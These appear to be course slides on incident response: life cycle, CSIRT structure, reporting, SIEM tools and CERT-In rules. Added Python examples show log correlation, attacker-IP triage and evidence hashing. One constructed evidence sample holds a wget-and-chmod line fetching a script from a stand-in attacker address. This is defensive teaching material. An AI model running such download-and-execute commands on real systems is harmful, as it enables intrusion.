UNIT-VII: Incident Response and Management
What is an incident?
Event
◦ An observable occurrence on a system or network.
Adverse event
◦ An event with negative consequences.
Computer security incident
◦ Any unlawful, unauthorized or unacceptable action that involves a computer system or a computer network.
◦ A violation, or an imminent threat of violation, of computer security policies, acceptable use policies, or standard security practices.
Examples of Incidents
Malicious code
◦ Viruses, worms, logic bombs, Trojans
Denial of Service
◦ Overwhelming a network service or link with floods of packets or requests so that legitimate users cannot use it.
Unauthorized access
◦ Accessing information or systems which a user is not authorized to
use.
Inappropriate usage
◦ Browsing pornographic sites during the lunch hour.
◦ Installing and using peer-to-peer (P2P) applications for file sharing.
◦ Installing an unauthorized Wi-Fi router to bypass company monitoring.
Need for Incident Response
• Attacks frequently compromise personal and business data, so it is critical to respond quickly and effectively when security breaches occur.
• The concept of computer security incident response has therefore become widely accepted and implemented.
• One benefit of having an incident response capability is that it supports responding to incidents systematically, i.e., following a consistent incident handling methodology, so that the appropriate actions are taken.
What is Incident Response (IR)?
• Incident Response (IR) is a structured approach to addressing and
managing security incidents, such as cyberattacks, data breaches, and
system failures.
• Key Objectives of Incident Response:
• Detect and identify security incidents.
• Contain the threat to prevent further damage.
• Eradicate the root cause of the incident.
• Recover and restore normal operations.
• Learn and improve from the incident.
Incident Response Policy, Plan, and Procedure
Policy: the incident response policy is a formal document that outlines an organization's approach to managing and responding to cybersecurity incidents; the plan and procedures are built on it.
Key element of Incident Response Policy:
Statement of management commitment
Purpose and objectives of the policy
Scope of the policy (to whom and what it applies and under what circumstances)
Definition of computer security incidents and related terms
Organizational structure and definition of roles, responsibilities, and levels of authority
Prioritization or severity ratings of incidents
Performance measures
Reporting and contact forms
Incident Response Policy, Plan, and Procedure, cont’d
Plan Elements:
• Organizations should have a formal, focused, and coordinated
approach to responding to incidents, including an incident response
plan that provides the roadmap for implementing the incident
response capability.
Procedure Elements:
• Procedures should be based on the incident response policy and plan.
• Standard operating procedures (SOPs) are a delineation of the specific
technical processes, techniques, checklists, and forms used by the
incident response team.
Sharing Information With Outside Parties
Incident Response Teams
• Central Incident Response Team
• Distributed Incident Response Teams
• Coordinating Team
Team Model Selection
• The Need for 24/7 Availability
• Full-Time Versus Part-Time Team Members
• Employee Morale
• Cost
• Staff Expertise
Incident Response Team Services
• Intrusion Detection
• Advisory Distribution
• Education and Awareness
• Information Sharing
Recommendations for Incident Handling
• Establish a formal incident response capability.
• Create an incident response policy, plan, and procedure
• Establish policies and procedures regarding incident-related information
sharing.
• Provide pertinent information on incidents to the appropriate organization.
• Consider the relevant factors when selecting an incident response team
model.
• Select people with appropriate skills for the incident response team
• Identify other groups within the organization
• Determine which services the team should offer
Handling an Incident: Incident Response Life Cycle
• Incident response requires many processes, considerations and actions, in which leadership and tactical teams must work in a focused manner to maintain security.
Preparation
• Preparing to handle incidents
  ◦ Incident response plan
  ◦ Communication and facilities
  ◦ Incident analysis hardware and software
  ◦ Incident analysis resources
  ◦ Incident mitigation software
  ◦ Roles/responsibilities
  ◦ SOPs
  ◦ Cyber insurance/key vendors
  ◦ Privacy considerations
• Preventing incidents
  ◦ Risk assessments
  ◦ Host security
  ◦ Network security
  ◦ Malware prevention
  ◦ User awareness and training
Detection and Analysis (Cyclical)
• Detection
  ◦ SOC or MSSP
  ◦ Attack Vectors
  ◦ Signs of an Incident
  ◦ Solutions
  ◦ External Support
  ◦ Dissemination of Information
  ◦ Sources of Precursors and Indicators: alerts, logs, publicly available information, people
• Analysis
  ◦ Profile Networks and Systems
  ◦ Understand Normal Behaviors
  ◦ Create a Log Retention Policy
  ◦ Perform Event Correlation
  ◦ Keep All Host Clocks Synchronized
  ◦ Maintain and Use a Knowledge Base of Information
  ◦ Use Internet Search Engines for Research
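Worked example (added here; it is not part of the original slides): two of the analysis items above, event correlation and clock synchronization, applied to a handful of constructed sshd log lines in Python. Host names, addresses, timestamps and the per-host clock offsets are invented for the illustration; the offsets stand in for values an analyst would take from NTP statistics before correlating.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample auth-log lines in "host ISO-timestamp sshd[pid]: ..." form.
# Host web2's clock runs 30 minutes fast, so its raw timestamps read 10:30.
SAMPLE_LOG = """\
web1 2024-03-04T10:00:01+00:00 sshd[2112]: Failed password for admin from 203.0.113.45 port 51022 ssh2
web1 2024-03-04T10:00:03+00:00 sshd[2112]: Failed password for admin from 203.0.113.45 port 51023 ssh2
web1 2024-03-04T10:00:05+00:00 sshd[2112]: Failed password for invalid user oracle from 203.0.113.45 port 51024 ssh2
web1 2024-03-04T10:00:09+00:00 sshd[2113]: Accepted password for admin from 203.0.113.45 port 51025 ssh2
web2 2024-03-04T10:30:10+00:00 sshd[3309]: Failed password for root from 203.0.113.45 port 40010 ssh2
web2 2024-03-04T10:30:12+00:00 sshd[3309]: Failed password for root from 203.0.113.45 port 40011 ssh2
web1 2024-03-04T10:30:00+00:00 sshd[2120]: Failed password for bob from 198.51.100.7 port 22222 ssh2
web1 2024-03-04T11:00:00+00:00 sshd[2130]: Accepted password for bob from 198.51.100.7 port 22223 ssh2
"""

# Assumed per-host clock error (host clock minus reference time). Subtracting
# it puts every event from every host on a single timeline.
CLOCK_OFFSETS = {"web1": timedelta(0), "web2": timedelta(minutes=30)}

LINE_RE = re.compile(
    r"^(?P<host>\S+) (?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse(log_text, offsets=CLOCK_OFFSETS):
    """Parse sshd lines into events with clock-corrected UTC timestamps."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrecognized line; in production count these as parser misses
        ts = datetime.fromisoformat(m["ts"]) - offsets.get(m["host"], timedelta(0))
        events.append({
            "host": m["host"],
            "time": ts.astimezone(timezone.utc),
            "result": m["result"],
            "user": m["user"],
            "ip": m["ip"],
        })
    events.sort(key=lambda e: e["time"])
    return events


def correlate(events, min_failures=3, window=timedelta(minutes=10)):
    """Flag each source IP with >= min_failures failed logins inside `window`,
    counted across all hosts, and note whether a successful login from the
    same IP followed inside that window (a precursor becoming an indicator)."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["result"] == "Failed"]
        for first in failures:
            deadline = first["time"] + window
            burst = [f for f in failures if first["time"] <= f["time"] <= deadline]
            if len(burst) < min_failures:
                continue
            threshold = burst[min_failures - 1]["time"]  # moment the burst became suspicious
            success = next(
                (e for e in evs
                 if e["result"] == "Accepted" and threshold <= e["time"] <= deadline),
                None,
            )
            alerts.append({
                "ip": ip,
                "failures": len(burst),
                "hosts": sorted({f["host"] for f in burst}),
                "users": sorted({f["user"] for f in burst}),
                "followed_by_success": success is not None,
                "compromised_account": success["user"] if success else None,
                "first_seen": first["time"].isoformat(),
            })
            break  # one alert per IP is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse(SAMPLE_LOG)):
        print(alert)
```

With the offsets applied, the two web2 failures land inside the same ten-minute window as the web1 ones and the alert shows one actor spraying two hosts and then logging in as `admin`; with `offsets={}` the web2 events drift 30 minutes away and the alert shrinks to a single host, which is the practical reason the slide insists on synchronized clocks.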
Containment, Eradication and Recovery (Cyclical)
• Containment
  ◦ Choosing a Containment Strategy
  ◦ Evidence Gathering and Handling
  ◦ Identifying the Attacking Hosts
    ◦ Validating the Attacking Host's IP Address
    ◦ Researching the Attacking Host
    ◦ Using Incident Databases
    ◦ Monitoring Possible Attacker Communication Channels
  ◦ Evidence Preservation
• Eradication and Recovery
  ◦ Phased and prioritized
  ◦ Eliminate components of the incident
  ◦ Identify and mitigate all vulnerabilities
  ◦ Restore systems to normal operation
  ◦ Confirm that the systems are functioning normally
  ◦ Remediate vulnerabilities to prevent similar incidents
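Worked example (added here; not from the original slides): a first validation step for "the attacking host's IP address" before any containment action is chosen. The point is that an address taken from a log is only a claim: an internal or non-routable address cannot be blocked at the perimeter, and a loopback or unspecified address cannot be a real remote peer, so it indicates spoofing or log corruption. The sample addresses are constructed; the category names are this example's own.

```python
import ipaddress

# Internal ranges (RFC 1918 and IPv6 ULA). An attack "from" one of these was
# launched inside the network or is seen behind NAT; a perimeter block does
# nothing, and the right move is an internal host investigation.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in
                     ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]


def classify_source(addr):
    """Return one of: invalid, internal, bogon, non_routable, external."""
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return "invalid"          # log corruption, or a hostname where an IP was expected
    if any(ip in net for net in INTERNAL_NETWORKS):
        return "internal"
    if ip.is_loopback or ip.is_link_local or ip.is_multicast or ip.is_unspecified:
        return "bogon"            # cannot be a real remote peer: spoofed or mislogged
    if not ip.is_global:
        return "non_routable"     # documentation, reserved or shared space: not a real peer either
    return "external"             # candidate for perimeter containment and reputation lookup


def triage(addresses):
    """Group candidate attacker addresses by what a handler can do with them."""
    return {a: classify_source(a) for a in addresses}


if __name__ == "__main__":
    # Constructed candidates as they might appear in alerts from several sensors.
    for addr, verdict in triage(["10.0.0.5", "127.0.0.1", "203.0.113.45",
                                 "93.184.216.34", "not-an-ip"]).items():
        print(f"{addr:>16}  {verdict}")
```

Only the `external` group is worth a block rule or a threat-intelligence query. Note the caveat the slide's bullet carries in the NIST guidance: pinging or scanning the address to "validate" it only proves that something answers there now, not that it sent the traffic, and it can tip off the attacker.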
Post-Incident Activity
• Using Incident Data
• After-Action Reviews (AARs)
• Updating SOPs and the IR Plan
• Evidence Retention
• Privacy Considerations
• Reporting Obligations
Incident Response Methodology
• Pre-incident preparation
• Detection of incidents
• Initial response
• Formulate response strategy
• Investigate the incident
• Reporting
• Resolution (and Improvement)
Pre-Incident Preparation
• For the organization
• This is where pro-active measures can be implemented.
• For the Computer Security Incident Response Team (CSIRT)
• Hardware and software needs.
• Forms and checklists for documenting incidents.
• Staff training.
Who Is Involved?
• Human resource personnel, legal counsel, technical experts, security
professionals, corporate security officers, business managers, end
users, help desk workers, and other employees.
• Computer Security Incident Response Team (CSIRT)
• A dynamic team assembled when an organization requires its capabilities.
Detection of Incidents
• One of the most important aspects of incident response.
• Items which should be recorded:
• Current date and time
• Who/what reported the incident
• Nature of the incident
• When the incident occurred
• Hardware/software involved
• Points of contact for involved personnel
Initial Response
Involves assembling the CSIRT, collecting network-based and other
data, determining the type of incident that has occurred, and
assessing the impact of the incident.
Document steps that must be taken.
Team must verify that an incident has actually occurred, which
systems are directly or indirectly affected, which users are involved,
and the potential business impact.
Formulate a Response Strategy
• Goal is to determine the most appropriate response strategy given the
circumstances of the incident.
• Factors to consider:
• How critical are the affected systems?
• How sensitive is the compromised or stolen information?
• Who are the potential perpetrators?
• Is the incident known to the public?
• What is the level of unauthorized access attained by the attacker?
• What is the apparent skill of the attacker?
• How much system and user downtime is involved?
• What is the overall dollar loss?
Taking Action
• Legal
• File a civil complaint and/or notify law enforcement.
• Administrative
• Usually deals with internal employees who have violated workplace policies.
Investigating the Incident
Data Collection
◦ Host-based information, network-based information, and other information.
◦ Collected from a live running system or one that is turned off.
◦ Must be collected in a forensically sound manner.
◦ Collect in a manner that protects its integrity (evidence handling).
Forensic Analysis
◦ Reviewing items such as log files, system configuration files, items left behind on
a system, files modified, installed applications (possible hacker tools), etc.
◦ Could involve many types of tools and techniques.
◦ May lead to additional data collection.
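Worked example (added here; not part of the original slides): what "collected in a forensically sound manner" and "protects its integrity" look like in code. The collection record below hashes each evidence file, stores who collected what from where, and can later prove whether any item was altered or lost; the manifest itself gets a digest so the record cannot be quietly edited either. The case identifier, analyst name, host name and file contents are constructed for the illustration.

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path, chunk_size=1 << 20):
    """Stream a file through SHA-256 so large images need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(paths, case_id, collector, source_host):
    """Record what was collected, by whom, from where, and each item's hash.
    This is the first entry in the chain-of-custody record."""
    return {
        "case_id": case_id,
        "collector": collector,
        "source_host": source_host,
        "collected_at": datetime.now(timezone.utc).isoformat(),
        "items": [
            {"name": os.path.basename(p), "size": os.path.getsize(p), "sha256": sha256_file(p)}
            for p in paths
        ],
    }


def manifest_digest(manifest):
    """Hash of the canonical JSON form. In practice sign this value and keep
    it apart from the evidence copy, so the record itself is tamper-evident."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(canonical).hexdigest()


def verify_manifest(manifest, directory):
    """Re-hash every item; returns name -> 'ok' | 'modified' | 'missing'."""
    results = {}
    for item in manifest["items"]:
        path = os.path.join(directory, item["name"])
        if not os.path.exists(path):
            results[item["name"]] = "missing"
        elif os.path.getsize(path) == item["size"] and sha256_file(path) == item["sha256"]:
            results[item["name"]] = "ok"
        else:
            results[item["name"]] = "modified"
    return results


def demo():
    """Collect two constructed evidence files, verify, then tamper and verify again."""
    with tempfile.TemporaryDirectory() as evidence_dir:
        auth_log = os.path.join(evidence_dir, "auth.log")
        history = os.path.join(evidence_dir, "bash_history")
        with open(auth_log, "w") as fh:   # constructed sample content
            fh.write("Mar  4 10:00:09 web1 sshd[2113]: Accepted password for admin from 203.0.113.45\n")
        with open(history, "w") as fh:    # constructed sample content
            fh.write("wget http://203.0.113.45/x.sh\nchmod +x x.sh\n")

        manifest = build_manifest([auth_log, history], "IR-2024-0001", "analyst1", "web1")
        original_digest = manifest_digest(manifest)
        before = verify_manifest(manifest, evidence_dir)

        # What verification must catch: an edited item and a lost one.
        with open(auth_log, "a") as fh:
            fh.write("Mar  4 10:00:10 web1 sshd[2113]: session opened for user admin\n")
        os.remove(history)
        after = verify_manifest(manifest, evidence_dir)

        # "Fixing" the record to match the edited file changes the manifest
        # digest, so a stored or signed digest exposes the edit.
        manifest["items"][0]["sha256"] = sha256_file(auth_log)
        manifest_edit_detected = manifest_digest(manifest) != original_digest
        return before, after, manifest_edit_detected


if __name__ == "__main__":
    print(demo())
```

Hash the original media before and after imaging, work only on verified copies, and log every hand-over against the manifest digest; the hashes are what lets the analyst later say in a report (or in court) that the files examined are the files collected.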
Reporting
• Keys to making this phase successful:
• Document immediately.
• Write concisely and clearly. Don’t use shorthand.
• Use a standard format.
• Have someone else review to ensure accuracy and completeness.
Resolution
• Three steps:
• Contain the problem.
• Solve the problem.
• Take steps to prevent the problem from occurring again.
Incident Handling Checklist
Incident Response Coordination
Outcomes
Better security means fewer incidents.
Be proactive to provide security services:
◦ Physical
◦ Network
◦ Workstation
◦ User training
Be prepared
◦ Have a plan.
◦ An incident response plan is vital. It is the blueprint for
dealing with incidents.
◦ A well-executed response can uncover the true extent of a
compromise and prevent future occurrences.
Popular Incident Response Software
• In industry, the detection and analysis side of incident response is usually supported by a Security Information and Event Management (SIEM) platform, which collects, correlates and alerts on logs from across the environment.
• ArcSight (Micro Focus, now OpenText)
  ◦ The Information Security Office (ISO) is using this software.
• Splunk by Splunk Inc.
  ◦ It has a free trial version, so we will teach this software in this course.
• Their functionality and interfaces are very similar to each other.
Indian Computer Emergency Response Team (CERT-In)
• Operational since January 2004; now functions under the Ministry of Electronics and Information Technology (MeitY).
• National nodal agency responsible for monitoring, preventing, and responding to cyber security incidents.
• Provides early warnings, threat intelligence, and cybersecurity guidelines.
• Conducts audits and awareness programs to improve cyber resilience.
Key Responsibilities and Core Services
• Key Responsibilities:
• Incident Response: Detecting, preventing, and mitigating cyber incidents.
• Threat Intelligence & Alerts: Issuing advisories on vulnerabilities and attacks.
• Security Guidelines: Providing best practices for IT security.
• Cybersecurity Training: Conducting workshops for professionals.
• Collaboration: Working with government, private sector, and international CERTs.
Core Services:
• Incident Handling & Digital Forensics
• Vulnerability Assessment & Penetration Testing (VAPT)
• Security Audits & Compliance Checks
• Malware & Threat Analysis
• Cybersecurity Drills & Simulations
Legal Framework
• Operates under the IT Act, 2000 (section 70B, inserted by the 2008 amendment).
• Mandates reporting of cyber incidents (CERT-In Rules, 2013, and the directions of 28 April 2022 issued under section 70B(6)).
• Issues security directives and compliance requirements.
• Investigates cyber threats and attacks.
• Example:
  ◦ April 2022 directions: CERT-In made reporting of specified cyber incidents mandatory within six hours of noticing them or being notified, for service providers, intermediaries, data centres, body corporates and government organisations.
  ◦ Impact: Strengthened cybersecurity response, improved compliance, and increased awareness.
UNIT-VIII: Data Leakage Prevention